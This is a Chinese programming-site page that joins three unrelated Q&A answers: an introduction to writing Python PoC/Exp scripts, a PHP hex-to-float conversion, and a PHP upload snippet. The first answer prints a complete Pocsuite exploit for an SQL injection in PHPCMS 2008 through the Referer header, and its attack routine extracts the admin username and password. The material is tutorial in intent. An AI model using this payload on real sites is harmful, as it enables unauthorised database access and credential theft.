基于Python 来编写 Poc/Exp 该怎么入门?

今天我爱编程网小编整理了基于Python 来编写 Poc/Exp 该怎么入门?相关信息，希望在这方面能够更好的大家。

本文目录一览：

• 1、基于Python 来编写 Poc/Exp 该怎么入门?
• 2、PHP 浮点进制转换
• 3、php如何将图片转成字节流

基于Python 来编写 Poc/Exp 该怎么入门?

其实吧，无论乌云的Tangscan也好，知道创宇的Pocsuite也好，还有Beebeeto也好（Bugscan没写过，不是特别了解不过应该差不多），关于Web的Poc和Exp，都极度依赖于两个Python库。
1. Requests ： 模拟Web的请求和响应等交互动作。
2. Re ： 正则表达式，用来验证返回的结果是否符合漏洞的预期，从而验证漏洞是否存在。

其余的大部分代码都是漏洞的信息。
以Pocsuite和Tangscan为例：
Pocsuite官方文档例子：
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['Medici.Yan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = [' -62274 ']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = ' '
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中广告模块，存在参数过滤不严，
导致了sql注入漏洞，如果对方服务器开启了错误显示，可直接利用，
如果关闭了错误显示，可以采用基于时间和错误的盲注
'''
samples = [' ']

def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)

def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload

return self.parse_attack(result)

def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output

register(TestPOC)

可以看到从代码11到28行都是漏洞的一些信息，真正的功能函数只有_attack和_verify两个而已。甚至这个例子有点繁琐了，现在大大们都是把exploit写在verify里面，所以真正起到功能的，也就不到十行的代码。 这个库其实就是Requests。用Requests模拟手工注入的Post提交，用正则匹配提取和验证必要信息，简单说起来就是这两个步骤。
这么一来你再看看其他的由Python写的Poc和Exp就大同小异了。Poc/Exp总的说来就只是用程序代替手工的过程而已，所以了解了漏洞的原理和认证方法之后就简单了。

PHP 浮点进制转换

下面是php实现的方法：
/**
 * 十六进制浮点型转为十进制
 * @param String $strHex 十六进制浮点数
 */
function hexToDecFloat($strHex) {
$v = hexdec($strHex);
$x = ($v & ((1 << 23) - 1)) + (1 << 23) * ($v >> 31 | 1);
$exp = ($v >> 23 & 0xFF) - 127;
return $x * pow(2, $exp - 23);
}

你说得很高深的样子，又不举例，不知道你究竟需要把什么样子的数转换成什么，上面是例子看看是不是你要的吧，如果不是，请一定举例。
我爱编程网

php如何将图片转成字节流

我爱编程网(https://www.52biancheng.com)小编还为大家带来php如何将图片转成字节流的相关内容。

在php中，有文件上传，那么php服务器端可以接收到请求参数 $_FILES,在 $_FILES数组中读取到上传文件的form表单名，然后在读取的数组中可以获取上传文件的源文件，使用 fopen()函数就可以获取文件的字节流了。
具体来点代码看看吧：(假定上传文件的表单名为 “formname”)
if($_FILES && isset($_FILES["formname"])){
//获取上传的文件的属性数组
$_fileinfo = $_FILES["formname"];
//获取上传文件的原文件名
$_filename = $_fileinfo["name"];
//获取上传文件的大小
$_filesize = $_fileinfo["size"];
//获取上传文件的临时文件名(长文件名)
$_filesource = $_fileinfo["tmp_name"];
//以读写方式打开文件，并将资源绑定到一个流上
$_filestream = fopen($_filesource,"ab");
//实现上传文件,其实质是把临时文件移动到制定的保存文件的位置
$_newfilename = "../mypath/filename.exp"; //自定义文件名，包含路径,可以是相对路径
move_uploaded_file($_filesource, $_newfilename);
}

以上就是我爱编程网小编给大家带来的基于Python 来编写 Poc/Exp 该怎么入门?全部内容，希望对大家有所帮助！更多相关文章关注我爱编程网：www.52biancheng.com

免责声明：文章内容来自网络，如有侵权请及时联系删除。